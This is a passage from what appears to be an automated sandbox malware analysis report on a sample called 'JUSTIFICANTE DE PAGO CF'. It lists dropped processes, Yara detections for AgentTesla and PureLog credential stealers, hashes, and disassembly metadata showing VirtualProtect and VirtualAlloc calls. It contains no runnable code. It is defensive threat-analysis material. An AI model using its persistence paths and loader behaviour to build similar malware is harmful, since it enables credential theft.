                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.2328135287.000000000276F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.2328135287.000000000276F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:10
                                                                              Start time:21:09:23
                                                                              Start date:21/02/2024
                                                                              Path:C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              Imagebase:0xb10000
                                                                              File size:32'256 bytes
                                                                              MD5 hash:5D9F0CA0E2B0E41F30A1CCE0B002484B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.3215330801.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.3215330801.0000000002F6A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3215330801.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.3215330801.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:11
                                                                              Start time:21:09:29
                                                                              Start date:21/02/2024
                                                                              Path:C:\Users\user\AppData\Roaming\repeat\repeat.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\repeat\repeat.exe"
                                                                              Imagebase:0x360000
                                                                              File size:32'256 bytes
                                                                              MD5 hash:5D9F0CA0E2B0E41F30A1CCE0B002484B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.2413286495.00000000037CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.2408937601.000000000288F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2408937601.000000000288F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2408937601.00000000027E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2408937601.00000000027E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.2408937601.0000000002717000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.2413286495.00000000038E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.2408937601.000000000268E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2408937601.000000000268E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:12
                                                                              Start time:21:09:31
                                                                              Start date:21/02/2024
                                                                              Path:C:\Users\user\AppData\Roaming\repeat\repeat.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Roaming\repeat\repeat.exe
                                                                              Imagebase:0xc10000
                                                                              File size:32'256 bytes
                                                                              MD5 hash:5D9F0CA0E2B0E41F30A1CCE0B002484B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.3213471421.000000000305E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.3213471421.000000000308A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3213471421.0000000003011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.3213471421.0000000003011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:7.1%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:38
                                                                                Total number of Limit Nodes:2
                                                                                execution_graph 7490 157d030 7491 157d048 7490->7491 7492 157d0a3 7491->7492 7494 15cc2e0 7491->7494 7495 15cc308 7494->7495 7498 15cc610 7495->7498 7496 15cc32f 7499 15cc633 7498->7499 7502 15cc6df 7499->7502 7503 15cbad0 7499->7503 7502->7496 7505 15cbae3 7503->7505 7507 15cbe98 7505->7507 7508 15cbee0 VirtualProtect 7507->7508 7510 15cbb66 7508->7510 7510->7496 7511 15c3ec0 7512 15c3ece 7511->7512 7513 15c3ed4 7512->7513 7519 15c455e 7512->7519 7522 15c4557 7512->7522 7526 15c4488 7512->7526 7529 15c686f 7512->7529 7533 15c6e0e 7512->7533 7521 15cbad0 VirtualProtect 7519->7521 7520 15c459b 7521->7520 7523 15c456a 7522->7523 7524 15c459b 7523->7524 7525 15cbad0 VirtualProtect 7523->7525 7525->7524 7536 15cc850 7526->7536 7532 15cbad0 VirtualProtect 7529->7532 7530 15c688c 7531 15c45f1 7531->7529 7531->7530 7532->7531 7535 15cbad0 VirtualProtect 7533->7535 7534 15c6e29 7535->7534 7539 15cc878 7536->7539 7541 15cc88b 7539->7541 7543 15cc928 7541->7543 7544 15cc968 VirtualAlloc 7543->7544 7546 15c44a8 7544->7546

                                                                                Executed Functions

                                                                                Function 015CCBD8 Relevance: 6.9, Strings: 5, Instructions: 671COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 15ccbd8-15ccc0a 2 15cd005-15cd023 0->2 3 15ccc10-15ccc24 0->3 7 15cd431-15cd43d 2->7 4 15ccc2b-15cccd9 3->4 5 15ccc26 3->5 49 15cccdf-15ccce7 4->49 50 15ccf47-15ccf6b 4->50 5->4 9 15cd031-15cd03d 7->9 10 15cd443-15cd454 7->10 11 15cd421-15cd426 9->11 12 15cd043-15cd0c3 9->12 20 15cd42e 11->20 31 15cd0db-15cd0f4 12->31 32 15cd0c5-15cd0cb 12->32 20->7 37 15cd0f6-15cd12c 31->37 38 15cd131-15cd16f 31->38 33 15cd0cd 32->33 34 15cd0cf-15cd0d1 32->34 33->31 34->31 37->20 58 15cd194-15cd1a1 38->58 59 15cd171-15cd192 38->59 52 15cccee-15cccf6 49->52 53 15ccce9-15ccced 49->53 60 15ccfef-15ccff5 50->60 56 15cccf8 52->56 57 15cccfb-15ccd1d 52->57 53->52 56->57 66 15ccd1f 57->66 67 15ccd22-15ccd28 57->67 68 15cd1a8-15cd1ae 58->68 59->68 62 15ccff7 60->62 63 15cd002 60->63 62->63 63->2 66->67 70 15ccd2e-15ccd48 67->70 71 15cced1-15ccedc 67->71 74 15cd1cd-15cd21f 68->74 75 15cd1b0-15cd1cb 68->75 72 15ccd8d-15ccd96 70->72 73 15ccd4a-15ccd4e 70->73 76 15ccede 71->76 77 15ccee1-15ccf17 call 15c3984 call 15cb7e8 71->77 80 15ccd9c-15ccdac 72->80 81 15ccfea 72->81 73->72 79 15ccd50-15ccd5b 73->79 113 15cd33a-15cd379 74->113 114 15cd225-15cd22a 74->114 75->74 76->77 115 15ccf3f 77->115 116 15ccf19-15ccf3d call 15cba90 * 2 77->116 82 15ccde9-15cce68 79->82 83 15ccd61 79->83 80->81 85 15ccdb2-15ccdc3 80->85 81->60 103 15cce6e-15cce72 82->103 104 15ccf70-15ccf82 82->104 88 15ccd64-15ccd66 83->88 85->81 89 15ccdc9-15ccdd9 85->89 92 15ccd6c-15ccd77 88->92 93 15ccd68 88->93 89->81 95 15ccddf-15ccde6 89->95 92->81 98 15ccd7d-15ccd89 92->98 93->92 95->82 98->88 102 15ccd8b 98->102 102->82 103->104 107 15cce78-15cce87 103->107 104->81 106 15ccf84-15ccfa1 104->106 106->81 110 15ccfa3-15ccfbf 106->110 111 15cce89 107->111 112 15ccec7-15ccecb 107->112 110->81 117 15ccfc1-15ccfdf 110->117 118 15cce8f-15cce91 111->118 112->70 112->71 137 15cd37b-15cd390 113->137 138 15cd392-15cd39e 113->138 123 15cd234-15cd237 114->123 115->50 116->115 117->81 120 15ccfe1 117->120 121 15cce9b-15cceb7 118->121 122 15cce93-15cce97 118->122 120->81 121->81 128 15ccebd-15ccec5 121->128 122->121 126 15cd23d 123->126 127 15cd302-15cd32a 123->127 130 15cd244-15cd270 126->130 131 15cd2d4-15cd300 126->131 132 15cd275-15cd2a1 126->132 133 15cd2a6-15cd2d2 126->133 136 15cd330-15cd334 127->136 128->112 128->118 130->136 131->136 132->136 133->136 136->113 136->123 144 15cd3a7-15cd406 137->144 138->144 147 15cd411-15cd41f 144->147 147->20
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1991858187.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_15c0000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4']q$TJbq$Te]q$paq$xb`q
                                                                                • API String ID: 0-1123639052
                                                                                • Opcode ID: 8330800df786e41bf7396996304978e5ce84c1f7d1885e010279887e2a67a781
                                                                                • Instruction ID: 1a3c90b7cba9564ef74889dca6c8489f0852d436c4b68c12e420ac6cab4a650a
                                                                                • Opcode Fuzzy Hash: 8330800df786e41bf7396996304978e5ce84c1f7d1885e010279887e2a67a781
                                                                                • Instruction Fuzzy Hash: 15423935A005159FCB15CFA8C984E59BBB2FF89714F1581A8E50AEB272DB31EC52CF80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015CBE98 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 427 15cbe98-15cbf19 VirtualProtect 430 15cbf1b-15cbf21 427->430 431 15cbf22-15cbf47 427->431 430->431
                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 015CBF0C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1991858187.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_15c0000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: 674f697aa69f257aaaa1976b5914bc8e575290889d52887c5892951a8df42c8c
                                                                                • Instruction ID: 6c03b33534ea85f838d60850ff49ddad1959f8717bc48819229c647a70646c70
                                                                                • Opcode Fuzzy Hash: 674f697aa69f257aaaa1976b5914bc8e575290889d52887c5892951a8df42c8c
                                                                                • Instruction Fuzzy Hash: 001106B1D002099FDB10DFAAC485AEEFBF5FF88720F10842AD519A7250C779A944CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015CC928 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 964 15cc928-15cc9a0 VirtualAlloc 967 15cc9a9-15cc9ce 964->967 968 15cc9a2-15cc9a8 964->968 968->967
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(?,?,?,?), ref: 015CC993
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1991858187.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_15c0000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 79db1f8b2eeecc01515865cb170dbc95c4ff04105205caf678917b32bb58952f
                                                                                • Instruction ID: b8e81dbfbb10373bad518f85194a09dad2548f79d1474b75a4443536be3da4ec
                                                                                • Opcode Fuzzy Hash: 79db1f8b2eeecc01515865cb170dbc95c4ff04105205caf678917b32bb58952f
                                                                                • Instruction Fuzzy Hash: 4A1134758002099FDB10DFAAC844AEEFFF5FF88720F208819D519AB250CB79A540CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0157D030 Relevance: .1, Instructions: 74COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1126 157d030-157d042 1127 157d0d3-157d0da 1126->1127 1128 157d048 1126->1128 1129 157d04a-157d056 1127->1129 1128->1129 1130 157d0df-157d0e4 1129->1130 1131 157d05c-157d07e 1129->1131 1130->1131 1133 157d080-157d09f call 15cc2e0 1131->1133 1134 157d0e9-157d0fe 1131->1134 1137 157d0a3-157d0b3 1133->1137 1138 157d0b5-157d0bd 1134->1138 1137->1138 1139 157d10b 1137->1139 1140 157d100-157d109 1138->1140 1141 157d0bf-157d0d0 1138->1141 1140->1141
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1991738792.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_157d000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7bfe981f48884b8967cc2ac46e5a06c1556d1ede5498b4f80e0208627c2a646c
                                                                                • Instruction ID: f898b41af2d7edae1cf57b32de153565ddb1ef33bd688421fc67b2fd241afa32
                                                                                • Opcode Fuzzy Hash: 7bfe981f48884b8967cc2ac46e5a06c1556d1ede5498b4f80e0208627c2a646c
                                                                                • Instruction Fuzzy Hash: C1210072504204DFCB16DF58E985B2ABFB5FF88310F20C569E9090F246D33AD806CAA2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0157D006 Relevance: .1, Instructions: 70COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1144 157d006-157d042 1145 157d0d3-157d0da 1144->1145 1146 157d048 1144->1146 1147 157d04a-157d056 1145->1147 1146->1147 1148 157d0df-157d0e4 1147->1148 1149 157d05c-157d07e 1147->1149 1148->1149 1151 157d080-157d09f call 15cc2e0 1149->1151 1152 157d0e9-157d0fe 1149->1152 1155 157d0a3-157d0b3 1151->1155 1156 157d0b5-157d0bd 1152->1156 1155->1156 1157 157d10b 1155->1157 1158 157d100-157d109 1156->1158 1159 157d0bf-157d0d0 1156->1159 1158->1159
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1991738792.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_157d000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 92cd032caa07775bf81e6a565927a32c8e8eb5ce45695d1d4006e121a70b7de8
                                                                                • Instruction ID: 8f24cac8f9988e67edb76820ef2774b05a2312dc7ad179343b1eb2afd5a2e1ed
                                                                                • Opcode Fuzzy Hash: 92cd032caa07775bf81e6a565927a32c8e8eb5ce45695d1d4006e121a70b7de8
                                                                                • Instruction Fuzzy Hash: 57214D755093C08FDB03CF64D990715BF71AF46214F1981EAD9848F567C239981ACB62
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07196B6D Relevance: .1, Instructions: 59COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1997850727.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7190000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b24262be749f675ae5f1eef10fe7c51211185a5ead07d461ff340c7f4b57e4c9
                                                                                • Instruction ID: b25cbc7455e287ce5f224b8c8bf89644707b455bc2e4cdf90be21c3c7e997a98
                                                                                • Opcode Fuzzy Hash: b24262be749f675ae5f1eef10fe7c51211185a5ead07d461ff340c7f4b57e4c9
                                                                                • Instruction Fuzzy Hash: 8A2108B4A04255CFCB55CF68C888A99BBF6FF49315F0444A9D849AB355C734AE82CF50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07191831 Relevance: .0, Instructions: 33COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1997850727.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7190000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9399cc8208aec5b0f73ac1e5002ae23b6a877cb33055c13ed1fc1107e379ebab
                                                                                • Instruction ID: 6e67898fad7b9f7217ec6df8a2a7237e48bd5800cf15ef887dd64bf0be1bae64
                                                                                • Opcode Fuzzy Hash: 9399cc8208aec5b0f73ac1e5002ae23b6a877cb33055c13ed1fc1107e379ebab
                                                                                • Instruction Fuzzy Hash: 1301D374E04269CFDB50DF28D868799B7B6FB89301F0444A5D90DA7380C7786E85CF51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07193BBB Relevance: .0, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1997850727.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7190000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e38f53e5038d5c2cfc51d33dd980da22a8f1f1a788b2acdb2b9122e612a2e3b3
                                                                                • Instruction ID: 2c8b0e70150f6ddcbfd6451ef0f9fe8f548e8bc7b968142ffd36e9f3074bc2c1
                                                                                • Opcode Fuzzy Hash: e38f53e5038d5c2cfc51d33dd980da22a8f1f1a788b2acdb2b9122e612a2e3b3
                                                                                • Instruction Fuzzy Hash: FEF06D71D06015CBEFA4AB18D9006E9B378FB89351F0504F6C91EAB282D7358E838F92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07192AB6 Relevance: .0, Instructions: 26COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1997850727.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7190000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 240924923a6529823da071fc8ee8c7613c31bd5f14cc0c9efdbeac4f5f0a3a08
                                                                                • Instruction ID: 54f2132a9cad13d2a0de2afc71cf3c1d3898c7814b52490e809e01425bdfae2c
                                                                                • Opcode Fuzzy Hash: 240924923a6529823da071fc8ee8c7613c31bd5f14cc0c9efdbeac4f5f0a3a08
                                                                                • Instruction Fuzzy Hash: FF015474A0021ACFDB94DF58D858B99B7F2FB48301F1481E9D589A7385DB345D84CFA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07194130 Relevance: .0, Instructions: 25COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1997850727.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7190000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 869fd959cb28f6c44589ea7f7e6e853207bdfe998583a1e42c250a4027e6b010
                                                                                • Instruction ID: c2ce83f4917897efe38d6dec8922816d135f801831f82217f941c141317f3699
                                                                                • Opcode Fuzzy Hash: 869fd959cb28f6c44589ea7f7e6e853207bdfe998583a1e42c250a4027e6b010
                                                                                • Instruction Fuzzy Hash: 2DF0F4B4A01259CFDB94DF58D859A9EB7B6FB88301F0040E9E50DA7380CB385D85CF50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07192A8F Relevance: .0, Instructions: 24COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1997850727.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7190000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d316e8833847ccd688bfddc2fc3bb56c67ee6b0b58f1cfecc10a2a20dbf801ff
                                                                                • Instruction ID: eefd8a9daa76a3088d74dc7383a971b15dd80cb8a7da42a54be0720039c8de61
                                                                                • Opcode Fuzzy Hash: d316e8833847ccd688bfddc2fc3bb56c67ee6b0b58f1cfecc10a2a20dbf801ff
                                                                                • Instruction Fuzzy Hash: EAF0EDB0A0020ACBCB84DF18C8846AABBF1BB4D310F0A42B5C44DA7280C7389D818F81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07193BF4 Relevance: .0, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1997850727.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7190000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 496977a6b9475b6c77e6f59897567bb2ddae9ebdde40d6311d2c776bbd5b234f
                                                                                • Instruction ID: b897cff71ad54b896d3ab03656402eca6043fcc2122a54b78fdf698cba0bff7b
                                                                                • Opcode Fuzzy Hash: 496977a6b9475b6c77e6f59897567bb2ddae9ebdde40d6311d2c776bbd5b234f
                                                                                • Instruction Fuzzy Hash: 78F03970A0221B8FE7529F28D865B9A7BE2FB56304F0410A9840D9B7D2EB344A82CB11
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07190A95 Relevance: .0, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1997850727.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7190000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: eab54b348851fbd31cceb758fce14717f8c40efb39a9dbf3a74cdcdd62979f14
                                                                                • Instruction ID: e47b3579100fbc8b25ce5297696cb4e9fce026176d014c2d434aad10a415a5c7
                                                                                • Opcode Fuzzy Hash: eab54b348851fbd31cceb758fce14717f8c40efb39a9dbf3a74cdcdd62979f14
                                                                                • Instruction Fuzzy Hash: 4CF058B8A01015CFCB94CF58D848AA9B7B6FB8C301F0482E8D609EB380C6349D958F60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 071961E3 Relevance: .0, Instructions: 14COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1997850727.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7190000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c1e5f1513e8c997a93d50706e23e6b03f5436787c3ba73abb2e48f482f92b2fa
                                                                                • Instruction ID: 3665014da4717df013f852549b6c4f7dd44681c250fbb98897a9e71df02db460
                                                                                • Opcode Fuzzy Hash: c1e5f1513e8c997a93d50706e23e6b03f5436787c3ba73abb2e48f482f92b2fa
                                                                                • Instruction Fuzzy Hash: 27D0A7344042059FD7448688E894AC633A1D309330F050531F51AB7281D29D1C838761
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0719F970 Relevance: .0, Instructions: 11COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1997850727.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7190000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                                • Instruction ID: 89f7625bcd3042e5662e2b0f59687678129b36ffb3fe7dec0c562e4284fda470
                                                                                • Opcode Fuzzy Hash: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                                • Instruction Fuzzy Hash: 05C04C753042085F9344DA9DD851C26F7E9DBD8614714C06DA90DC7351EA72FD13C694
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 015C3F78 Relevance: 2.7, Strings: 2, Instructions: 158COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1991858187.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_15c0000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4']q$4']q
                                                                                • API String ID: 0-3120983240
                                                                                • Opcode ID: d323d1889eaf45e278c1e1285713ca2ce185457c3915df9b84658b92eac5e462
                                                                                • Instruction ID: 51e27db21ecdea8951264d76b6492047d588bdade794750c1c20b24cedc9e87d
                                                                                • Opcode Fuzzy Hash: d323d1889eaf45e278c1e1285713ca2ce185457c3915df9b84658b92eac5e462
                                                                                • Instruction Fuzzy Hash: FB614A70E10605AFD748DF6AF945A8A7BE7FFD8200F14C539C019AB269EF3858098B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015C3F88 Relevance: 2.6, Strings: 2, Instructions: 149COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1991858187.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_15c0000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4']q$4']q
                                                                                • API String ID: 0-3120983240
